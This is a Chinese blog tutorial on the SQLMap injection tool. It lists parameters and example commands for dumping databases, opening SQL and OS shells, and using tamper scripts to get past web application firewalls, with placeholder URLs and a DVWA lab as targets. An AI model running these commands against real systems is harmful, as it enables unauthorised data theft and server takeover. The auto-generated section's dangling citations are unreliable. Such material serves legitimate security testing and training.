关于SQLMap的使用

本文详细介绍SQLMap的基本及常用参数,包括显示Web容器、数据库版本信息,读取数据库、列出所有表及字段,以及如何执行SQL和系统命令。适用于渗透测试和数据库安全检查。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

**

一、SQLMap基本参数

**
1.如果存在注入点,将会显示Web容器、数据库版本信息。-u
2.读取整个数据库 -u “xxx” --dbs

3.查看当前应用程序所用数据库:sqlmap -u “http://XXXXXXX?id=1” --current-dbs

4、列出指定数据库的所有表:sqlmap -u “http://XXXXXXX?id=1” --tables -D “admin”

5、读取指定表中的字段名称:sqlmap -u “http://XXXXXXX?id=1” --columns -T “user” -D “admin”

6.–dump参数意为转存数据,-C参数指定字段名称,-T指定表名,-D指定数据库名称。如果有数据库关键字需要加上"[]",如[User]。

结果存储在 C:\Users\ww\AppData\Local\sqlmap\output\

二、SQLMap 常用参数

–batch 默认选择是
–random-agent 随机
–r 1.txt 请求包注入
–level 3 注入等级
–sql-shell --sql-query=“sql” 执行SQL命令
–os-shell 执行系统命令

### 关于 SQLMap 使用教程 #### 工具概述 SQLMap 是一个功能强大的自动化 SQL 注入工具,可以用来检测并利用 SQL 注入漏洞以接管数据库服务器。此工具不仅能够识别不同类型的注入点,还能执行多种攻击向量,并支持广泛的数据库管理系统 (DBMS)[^2]。 #### 常用参数说明 为了有效地使用 SQLMap 进行安全评估,了解一些基本命令行选项是非常重要的: - `-u` 或 `--url`: 指定目标 URL。 - `--data`: 提交 POST 数据给指定的目标页面。 - `--cookie`: 设置 HTTP Cookie 头中的值。 - `--level=<LEVEL>`: 设定测试级别,默认为 1;范围是从 1 到 5。 - `--risk=<RISK>`: 定义风险等级,默认为 1;可选值有 0, 1, 2 和 3。 - `--batch`: 自动选择默认选项而不提示用户输入。 - `--threads=<THREADS>`: 并发线程数(默认为 1),增加速度但可能引起更多噪音[^3]. ```bash sqlmap -u "http://example.com/vulnerable.php?id=1" ``` 这段代码展示了如何通过提供带有潜在注入点的 GET 请求来启动一次简单的扫描操作[^4]。 #### Tamper 脚本应用 Tamper 脚本允许修改请求包的内容,在某些情况下可以帮助绕过 Web 应用防火墙(WAF)或其他防护措施。例如,“randomcase.py” tamper 可随机改变大小写,从而混淆 WAF 的规则匹配机制[^1]: ```bash sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=randomcase.py ``` #### 实际案例分析 考虑这样一个场景——在一个低级别的 DVWA(Damn Vulnerable Web Application)环境中练习 SQL 注入技巧。这里展示了一个具体的应用实例,其中包含了从发现到提取敏感信息的过程[^5]。 ```bash # 发现注入点 sqlmap -u "http://dvwa.local/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbms=mysql --dump-all --batch # 绕过 magic_quotes_gpc 防护 sqlmap -u "http://targetsite.com/index.php?search=test" --tamper=between.py --technique=B --level=5 --risk=3 ``` 上述命令分别演示了怎样在已知存在 SQLi 缺陷的服务上进行全面的数据转储以及采用特定技术手段规避 PHP 中启用的安全特性 Magic Quotes GPC 对单引号和双引号进行转义的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值